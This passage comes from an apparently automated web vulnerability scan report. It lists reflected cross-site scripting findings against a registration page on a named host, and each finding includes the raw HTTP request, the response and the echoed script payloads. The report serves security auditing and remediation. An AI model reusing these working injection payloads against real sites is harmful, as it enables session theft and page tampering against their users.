Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:37 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<49fc1;alert(1)//e5f7179fe3b/images/icons/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.171. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f1b"><script>alert(1)</script>467b1bb9f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/f8f1b"><script>alert(1)</script>467b1bb9f7/images/icons/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/f8f1b"><script>alert(1)</script>467b1bb9f7/images/icons/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.172. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e9df"-alert(1)-"11fb93fe642 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C9e9df"-alert(1)-"11fb93fe642/images/icons/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:33 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<9e9df"-alert(1)-"11fb93fe642/images/icons/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.173. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c94f8"-alert(1)-"44eff63519e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesc94f8"-alert(1)-"44eff63519e/icons/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:49 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesc94f8"-alert(1)-"44eff63519e/icons/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.174. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 793d5%3balert(1)//2fea90d5d7d was submitted in the REST URL parameter 3. This input was echoed as 793d5;alert(1)//2fea90d5d7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images793d5%3balert(1)//2fea90d5d7d/icons/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:09 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images793d5;alert(1)//2fea90d5d7d/icons/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.175. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58a68"-alert(1)-"495c6efacbf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons58a68"-alert(1)-"495c6efacbf/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:24:25 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons58a68"-alert(1)-"495c6efacbf/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.176. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d24da%3balert(1)//a7e9a31a46a was submitted in the REST URL parameter 4. This input was echoed as d24da;alert(1)//a7e9a31a46a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/iconsd24da%3balert(1)//a7e9a31a46a/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:25:15 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/iconsd24da;alert(1)//a7e9a31a46a/accept.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.177. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c584%3balert(1)//2a1deb55774 was submitted in the REST URL parameter 5. This input was echoed as 8c584;alert(1)//2a1deb55774 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png8c584%3balert(1)//2a1deb55774 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:27:22 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/accept.png8c584;alert(1)//2a1deb55774?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.178. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d19"-alert(1)-"3b076d4e827 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.pngd2d19"-alert(1)-"3b076d4e827 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:26:03 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/accept.pngd2d19"-alert(1)-"3b076d4e827?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.179. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 753da%3balert(1)//2b4d3e703f2 was submitted in the REST URL parameter 2. This input was echoed as 753da;alert(1)//2b4d3e703f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C753da%3balert(1)//2b4d3e703f2/images/icons/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:46 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<753da;alert(1)//2b4d3e703f2/images/icons/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.180. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2081"><script>alert(1)</script>dd2752b460 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/a2081"><script>alert(1)</script>dd2752b460/images/icons/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/a2081"><script>alert(1)</script>dd2752b460/images/icons/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.181. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9992"-alert(1)-"7269bcab6ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cd9992"-alert(1)-"7269bcab6ee/images/icons/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:45 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<d9992"-alert(1)-"7269bcab6ee/images/icons/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.182. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 707af"-alert(1)-"ed02f606ffa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images707af"-alert(1)-"ed02f606ffa/icons/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:23 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images707af"-alert(1)-"ed02f606ffa/icons/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.183. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

